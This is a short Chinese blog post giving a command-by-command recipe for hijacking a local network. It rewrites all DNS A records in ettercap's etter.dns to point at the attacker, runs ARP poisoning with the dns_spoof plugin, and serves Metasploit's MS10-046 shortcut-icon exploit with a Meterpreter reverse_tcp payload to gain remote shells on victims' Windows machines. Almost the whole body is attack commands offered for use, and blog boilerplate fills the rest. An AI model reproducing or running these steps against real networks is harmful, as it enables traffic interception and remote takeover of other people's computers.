Metasploit内网/局域网劫持

  • 内容
  • 相关

内网渗透劫持DNS拿到cmdshell,如下步骤:


ifconfig //获取IP及网卡信息leafpad /etc/ettercap/etter.dns //打开文件 插入* A 记录 预设IPservice apache2 start //启动本机apache服务 此次不用启动,使用ms10_046会自动启动//* A ip 劫持所有A记录//*.com A ip 劫持msfconsole //启动msfsearch ms10_046 //搜索ms10_046use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //设置模块set payload windows/meterpreter/reverse_tcpset lhost ifconfig的ip(本机ip或预设IP) //监听set servhost ifconfig的ip(本机ip或预设IP)exploit //执行ettercap -T -q -i eth0 -P dns_spoof -M arp /// /// //劫持 -i 网卡 -P 插件 ///分别代表 任意IP 任意地址此时同意网段内用户访问网站时会 劫持 并与本机建立会话目标机器上线后 jobs sessions -lsession -i 1



本文标签:

收录状态:百度√[百度已收录]丨360√[360已收录]丨搜狗√[搜狗已收录]

版权声明:若无特殊注明,本文皆为《Mracat》原创,转载请保留文章出处。

本文链接:Metasploit内网/局域网劫持 - https://mracat.com/219.html

本文短域名链接:http://t.cn/A6hIPVX3

用手机扫描访问本文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

请勿乱用他人邮箱,否者您将收不到最新动态消息~